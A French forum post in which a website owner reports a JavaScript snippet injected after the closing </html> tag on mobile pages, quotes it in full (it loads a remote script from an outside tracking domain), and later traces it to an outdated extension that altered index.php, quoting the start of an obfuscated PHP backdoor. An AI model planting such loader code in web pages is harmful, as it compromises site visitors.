Bonjour à tous,
depuis peu, j'ai automatiquement l'injection de ce code javascript dans les pages après la balise </html> qui renvoi vers des sites de hacking... J'ai beau cherché dans la base de données et dans l'ensemble des fichiers, je ne trouve pas la moindre de trace, même dans le template footer, ça se termine avec la balise </html>, mais jamais avec ce code, de plus, ça ne le fait que depuis un téléphone mobile. Depuis un ordinateur avec la page de taille mobile pour simuler, il n'y a rien, ça se termine par </html>.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
|
</body>
</html>
<script type='text/javascript'>function showsscript(){
var d=document;var s=d.createElement('script');
s.src='//track.transportgoline.com/store.js';
s.id='trackmaincode';
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
}
var cant=0;
var scripts = document.getElementsByTagName('script');
for (var i = 0; i < scripts.length; i++) {
if (scripts[i].id=='trackmaincode') {
cant=1;
}
}
if(cant==0){
showsscript();
}</script> |
Avez-vous une idée ?
Merci !
UPDATE du jour :
une extension qui n'étais pas à jour a permis de modifier le fichier index.php, avec en en-tête du code php :
$a9="register_shutdown_function";$b9="function_exists";function trymyexitthis(){$a9="register_shutdown_function"; ..........
j'ai supprimé le code et tout mis à jour, si ça peut aider quelqu'un...
JCRENO
injection javascript en fin de page
Répondre avec citation
Partager